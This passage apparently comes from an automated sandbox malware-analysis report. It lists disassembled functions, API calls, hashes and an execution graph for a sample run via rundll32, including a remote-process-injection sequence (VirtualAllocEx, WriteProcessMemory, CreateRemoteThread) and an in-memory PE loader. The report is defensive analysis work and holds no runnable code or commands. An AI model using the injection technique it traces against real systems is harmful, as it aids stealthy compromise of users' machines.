                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D9416872E00208ABCF05DFD4CC54ADD7BB5FF08311F208549E956AB291DB79AA19EF90
                                                                                                                                                                                                                                                  Function 00F56059 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00F5607E
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: EncodePointer
                                                                                                                                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                                                                                                                                  • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                                  • Opcode ID: 6fe09968ef61dc34d205fecb5fbfb5ea40e1e932f57a947b368772b8ed934edb
                                                                                                                                                                                                                                                  • Instruction ID: fac77c736c70cd524441625ddf2f4a97f3befc87d1abe2dadc758b11973ab9cc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6fe09968ef61dc34d205fecb5fbfb5ea40e1e932f57a947b368772b8ed934edb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F5418831D00609EFCF15DF98CC81AAEBBB6BF08311F188158FE18A7252D3399954EB50
                                                                                                                                                                                                                                                  Function 00F4DF8F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: H_prolog3___cftoe
                                                                                                                                                                                                                                                  • String ID: !%x
                                                                                                                                                                                                                                                  • API String ID: 855520168-1893981228
                                                                                                                                                                                                                                                  • Opcode ID: 826f9ff01f41c2348e8f6cde7de7c48a8b565be0b8bb9adc0685f8b6e840c9c3
                                                                                                                                                                                                                                                  • Instruction ID: d1f51bb882d5159283e69f32e07dab1cddc9589a650cac6eab93433c4b75d484
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 826f9ff01f41c2348e8f6cde7de7c48a8b565be0b8bb9adc0685f8b6e840c9c3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11318B71D0020DEBDF04DF98E881AEEBBB6FF48314F104419F905A7251DB79AA49DB64
                                                                                                                                                                                                                                                  Function 00F519FA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: H_prolog3___cftoe
                                                                                                                                                                                                                                                  • String ID: !%x
                                                                                                                                                                                                                                                  • API String ID: 855520168-1893981228
                                                                                                                                                                                                                                                  • Opcode ID: ee0aa8fd6db1a64965e9bbc616a427f0016edf76033f2694c67caf1cc178f137
                                                                                                                                                                                                                                                  • Instruction ID: 09744c04664cd3f027451f50d36265e08ce6fe851eb23ad5b87494e88b3d52a5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ee0aa8fd6db1a64965e9bbc616a427f0016edf76033f2694c67caf1cc178f137
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A315A32D15258AFEF01DF98DC41BEEBBB5BF09311F100019F944A7242D779AA49EBA0
                                                                                                                                                                                                                                                  Function 00F35F40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ConvertSidToStringSidW.ADVAPI32(?,00000000), ref: 00F35F86
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(00000000,Invalid SID,0000000B,?,00000000,80A20388), ref: 00F35FF6
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ConvertFreeLocalString
                                                                                                                                                                                                                                                  • String ID: Invalid SID
                                                                                                                                                                                                                                                  • API String ID: 3201929900-130637731
                                                                                                                                                                                                                                                  • Opcode ID: 2a2d9031059db65da200d6e9f5a466c4b523c256c1f999b7ce5acddb383f24ed
                                                                                                                                                                                                                                                  • Instruction ID: f9de7a073d5be384f166f447d1e8f3002abe3b47d4f42f60c35e88cddef5f632
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2a2d9031059db65da200d6e9f5a466c4b523c256c1f999b7ce5acddb383f24ed
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED21C070A047199BDB14DF68C815BAFBBF8FF44B24F10451EE405A7380D7B9AA049BD1
                                                                                                                                                                                                                                                  Function 00F39070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F3909B
                                                                                                                                                                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00F390FE
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                                                                                                  • String ID: bad locale name
                                                                                                                                                                                                                                                  • API String ID: 3988782225-1405518554
                                                                                                                                                                                                                                                  • Opcode ID: b6672fcc79595a3920c9a233e232318889c22252fc1276031014371e63d37fe6
                                                                                                                                                                                                                                                  • Instruction ID: 39be322fdf4d2a96a7d4467f1ee3a306f89ca62395949371f4395ae0dd7f21ce
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6672fcc79595a3920c9a233e232318889c22252fc1276031014371e63d37fe6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1321C370805784DED721CF68C90478BBFF4EF15710F10869ED49597781D7B9A604D7A1
                                                                                                                                                                                                                                                  Function 00F3F098 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: H_prolog3_
                                                                                                                                                                                                                                                  • String ID: false$true
                                                                                                                                                                                                                                                  • API String ID: 2427045233-2658103896
                                                                                                                                                                                                                                                  • Opcode ID: 6991ca4f5cf482074d95bbafa9318eac4364ef6c3e82ac7de85e8d92b766e746
                                                                                                                                                                                                                                                  • Instruction ID: 0d093a449356a8607a440341b52527694960ecc4940a971a6568a5795e2e671e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6991ca4f5cf482074d95bbafa9318eac4364ef6c3e82ac7de85e8d92b766e746
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E311D3B1D40B80AFC724EFB4D841B8ABBF4AF05310F04C51AE592DB241EB74E608EB91
                                                                                                                                                                                                                                                  Function 00F34070 Relevance: 5.2, APIs: 4, Instructions: 189memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(00000000,00F34261,00F74400,000000FF,80A20388,00000000,?,00000000,?,?,?,00F74400,000000FF,?,00F33A75,?), ref: 00F34096
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,40000022,80A20388,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00F34154
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,3FFFFFFF,80A20388,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00F34177
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00F34217
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Local$AllocFree
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2012307162-0
                                                                                                                                                                                                                                                  • Opcode ID: 8bd96ceb466858fd9de0e686483de91653dbf8c714341a4d1fad151aa90c16d2
                                                                                                                                                                                                                                                  • Instruction ID: be474dc0c234308dd2e1be3567ee9f8499df09279fdee96d84a1dc7adb201af1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8bd96ceb466858fd9de0e686483de91653dbf8c714341a4d1fad151aa90c16d2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F519DB1A006059FDB18DF68C985AAEBBB5FB48360F14462DE929E7380D734FD44DB90
                                                                                                                                                                                                                                                  Function 00F31D80 Relevance: 5.2, APIs: 4, Instructions: 171memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,80000022,00000000,?,00000000), ref: 00F31E01
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,7FFFFFFF,00000000,?,00000000), ref: 00F31E21
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(7FFFFFFE,?,00000000), ref: 00F31EA7
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(00000001,80A20388,00000000,00000000,00F73C40,000000FF,?,00000000), ref: 00F31F2D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Local$AllocFree
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2012307162-0
                                                                                                                                                                                                                                                  • Opcode ID: 003d15609ea4b1fa49dbd6d9c783b8d96cbdea036ef8c8a7619670f19be2b016
                                                                                                                                                                                                                                                  • Instruction ID: 951de30956ca153643b851778e3459de1d7b758b036e31c76f4b8adfd608b9ff
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 003d15609ea4b1fa49dbd6d9c783b8d96cbdea036ef8c8a7619670f19be2b016
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F251E172A082159FC715EF28DC40A6ABBE8FB49370F110A2EF916D7290DB71E9449791

                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                  Execution Coverage:0.7%
                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:88.3%
                                                                                                                                                                                                                                                  Signature Coverage:7.8%
                                                                                                                                                                                                                                                  Total number of Nodes:77
                                                                                                                                                                                                                                                  Total number of Limit Nodes:16
                                                                                                                                                                                                                                                  execution_graph 32658 16ad27515e0 32659 16ad2751608 32658->32659 32661 16ad27515fe 32658->32661 32660 16ad2751619 32659->32660 32663 16ad275168c VirtualProtect 32659->32663 32660->32661 32662 16ad2751664 VirtualFree 32660->32662 32662->32661 32663->32661 32665 16ad2751200 32666 16ad2751215 32665->32666 32667 16ad275121f 32665->32667 32674 16ad2751070 VirtualQuery 32666->32674 32670 16ad275122d 32667->32670 32673 16ad27511c0 VirtualAlloc 32667->32673 32671 16ad275123d 32671->32670 32675 16ad2751190 VirtualFree 32671->32675 32673->32671 32674->32667 32675->32670 32676 16ad2751000 32682 16ad2752650 32676->32682 32680 16ad2751055 ExitProcess 32686 16ad2752050 32682->32686 32685 16ad27526b0 SetLastError SetLastError SetLastError SetLastError SetLastError 32685->32680 32721 16ad2751340 32686->32721 32689 16ad275103a 32689->32685 32690 16ad27520bf SetLastError 32690->32689 32691 16ad27520d1 32692 16ad2751340 SetLastError 32691->32692 32693 16ad27520f8 32692->32693 32693->32689 32694 16ad275213e 32693->32694 32695 16ad275212c SetLastError 32693->32695 32696 16ad275214e SetLastError 32694->32696 32697 16ad2752160 32694->32697 32695->32689 32696->32689 32698 16ad275216f SetLastError 32697->32698 32700 16ad2752181 GetNativeSystemInfo 32697->32700 32698->32689 32701 16ad275229a VirtualAlloc 32700->32701 32702 16ad2752288 SetLastError 32700->32702 32703 16ad27522ff GetProcessHeap HeapAlloc 32701->32703 32704 16ad27522c7 VirtualAlloc 32701->32704 32702->32689 32706 16ad275234b 32703->32706 32707 16ad2752326 VirtualFree SetLastError 32703->32707 32704->32703 32705 16ad27522ed SetLastError 32704->32705 32705->32689 32708 16ad2751340 SetLastError 32706->32708 32707->32689 32709 16ad27523fc 32708->32709 32710 16ad275240a VirtualAlloc 32709->32710 32720 16ad2752400 32709->32720 32711 16ad2752450 32710->32711 32724 16ad2751380 32711->32724 32714 16ad27524ac 32714->32720 32732 16ad2751c80 7 API calls 32714->32732 32716 16ad2752527 32716->32720 32733 16ad2751790 VirtualFree VirtualProtect 32716->32733 32718 16ad2752547 32719 16ad27525da SetLastError 32718->32719 32718->32720 32719->32720 32720->32689 32734 16ad27528e0 VirtualFree VirtualFree GetProcessHeap HeapFree 32720->32734 32722 16ad275135f SetLastError 32721->32722 32723 16ad275136e 32721->32723 32722->32723 32723->32689 32723->32690 32723->32691 32728 16ad27513ce 32724->32728 32725 16ad275149c 32726 16ad2751340 SetLastError 32725->32726 32729 16ad27514c0 32726->32729 32727 16ad275141e VirtualAlloc 32727->32728 32731 16ad2751458 32727->32731 32728->32725 32728->32727 32728->32731 32730 16ad27514cb VirtualAlloc 32729->32730 32729->32731 32730->32731 32731->32714 32732->32716 32733->32718 32734->32689 32735 273f41380 Sleep VirtualAllocEx 32736 273f4144e 32735->32736 32737 273f413d2 WriteProcessMemory 32735->32737 32737->32736 32738 273f41402 CreateRemoteThread 32737->32738 32738->32736 32739 273f4143c 32738->32739 32739->32736 32740 273f41440 WaitForSingleObject 32739->32740 32740->32736 32741 273f414d0 32742 273f414e0 SleepEx 32741->32742 32742->32742 32743 180005780 32744 180055c42 32743->32744 32747 180055c62 32744->32747 32746 180055c4b 32748 180055cf3 32747->32748 32749 180055d61 VirtualAlloc 32748->32749 32750 180055de2 32749->32750 32750->32750 32751 180055ecf VirtualAlloc 32750->32751 32752 180055eed 32751->32752 32752->32746

                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                  Function 0000000180055C62 Relevance: 24.3, APIs: 2, Strings: 14, Instructions: 326memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 0 180055c62-180055cee 1 180055cf3-180055cf7 0->1 2 180055d02-180055d0d 1->2 2->2 3 180055d0f-180055d17 2->3 3->1 4 180055d19-180055d1d 3->4 5 180055d2e 4->5 6 180055d1f-180055d2c call 1800562b2 4->6 8 180055d32-180055ddd call 180056312 * 3 VirtualAlloc 5->8 6->8 16 180055de2-180055ec1 8->16 16->16 17 180055ec7-180055ee7 call 180056162 VirtualAlloc 16->17 20 180056148-18005615d 17->20 21 180055eed-180055f43 call 180056192 17->21 21->20 24 180055f49-180055f54 21->24 25 180055f58-180055f5e 24->25 26 180055f60-180055f69 25->26 27 180055f6f-180055f72 25->27 26->27 30 180055f6b 26->30 28 180055f74-180055f7d 27->28 29 180055f83-180055fa3 call 180056192 27->29 28->29 31 180055f7f 28->31 29->25 34 180055fa5-180055fb1 29->34 30->27 31->29 34->20 35 180055fb7-180055fc0 34->35 36 180055fc6-180055fce 35->36 37 180056055-180056063 35->37 39 180055fd2-180055fea 36->39 37->20 38 180056069-180056072 37->38 40 180056074-180056079 38->40 41 1800560ee-1800560f8 call 180056172 38->41 42 18005604c-18005604f 39->42 43 180055fec 39->43 46 180056082-180056092 40->46 52 1800560fa-18005610b 41->52 53 18005612b-180056143 call 1800561c2 41->53 42->39 44 180056051 42->44 47 180055ff2-180056006 43->47 44->37 46->20 58 180056098-1800560a4 46->58 49 180056008-18005603f call 180056192 * 2 47->49 50 180056044-180056047 47->50 49->50 50->47 51 180056049 50->51 51->42 52->53 56 18005610d 52->56 53->20 60 180056112-180056129 56->60 62 1800560a6-1800560b0 58->62 63 1800560df-1800560e8 58->63 60->53 67 1800560b2-1800560b8 62->67 63->46 66 1800560ea 63->66 66->41 69 1800560bf-1800560c3 67->69 70 1800560ba-1800560bd 67->70 71 1800560c6-1800560d8 69->71 70->71 71->67 73 1800560da 71->73 73->63
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                  • String ID: $=$.$3$MC1t$^qE?$bIfh$e$eBOO$ioAU$k$l$nEhx$r$sYP
                                                                                                                                                                                                                                                  • API String ID: 4275171209-1846638993
                                                                                                                                                                                                                                                  • Opcode ID: 43cc6e01d3af8756f24444348060f7009d82bdb323a80667e739bd446e939b0d
                                                                                                                                                                                                                                                  • Instruction ID: 0aba12783aff90d63c6f286ccc0a077e7894613a05cce7ad61c0a4bd09775adc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 43cc6e01d3af8756f24444348060f7009d82bdb323a80667e739bd446e939b0d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7CD1103270168887EB55CF25E4147AD7BA1F749BC8F488025FE8D5BB85EE39DA49C700
                                                                                                                                                                                                                                                  Function 0000000273F41380 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62injectionsleepmemoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 150 273f41380-273f413cc Sleep VirtualAllocEx 151 273f41456-273f41466 150->151 152 273f413d2-273f41400 WriteProcessMemory 150->152 153 273f41402-273f4143a CreateRemoteThread 152->153 154 273f41453 152->154 153->151 155 273f4143c-273f4143e 153->155 154->151 156 273f4144e-273f41451 155->156 157 273f41440-273f41448 WaitForSingleObject 155->157 156->151 157->156
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3794425031.0000000273F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000273F40000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794369878.0000000273F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794425031.0000000273F85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_273f40000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocCreateMemoryObjectProcessRemoteSingleSleepThreadVirtualWaitWrite
                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                  • API String ID: 3172812169-2766056989
                                                                                                                                                                                                                                                  • Opcode ID: 7fcec4437536d1c811a67ff0d3e935be9d4b92fa0fac673d0b509e6aa8ba7f62
                                                                                                                                                                                                                                                  • Instruction ID: 70ca693b3c1452cbeb4233b6b91bedeb956dc212f3bce1284f7759b325db5040
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7fcec4437536d1c811a67ff0d3e935be9d4b92fa0fac673d0b509e6aa8ba7f62
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F117F22709E9042F6A0CF26BC08B5666A0B789FF4F644324EFBD17BE5DB38C6059605
                                                                                                                                                                                                                                                  Function 00007DF457370100 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 214COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000003.1812402828.00007DF457370000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF457370000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_3_7df457370000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateSnapshotToolhelp32
                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                  • API String ID: 3332741929-2766056989
                                                                                                                                                                                                                                                  • Opcode ID: 4dd753c87e2aa29c9c96ae48a87dd40f0169a1ec6aa8ae238ef9ae283b3ca07b
                                                                                                                                                                                                                                                  • Instruction ID: 4c80bb681854a8c452d6bfbb700bfb3c2136b7447f6a1c8e11a05156639b6d57
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4dd753c87e2aa29c9c96ae48a87dd40f0169a1ec6aa8ae238ef9ae283b3ca07b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C771AF3161894C8FEB94EF5CD898BAD77E1FB98325F104626E81EC73A0DB749954CB80
                                                                                                                                                                                                                                                  Function 0000016AD27DDACE Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
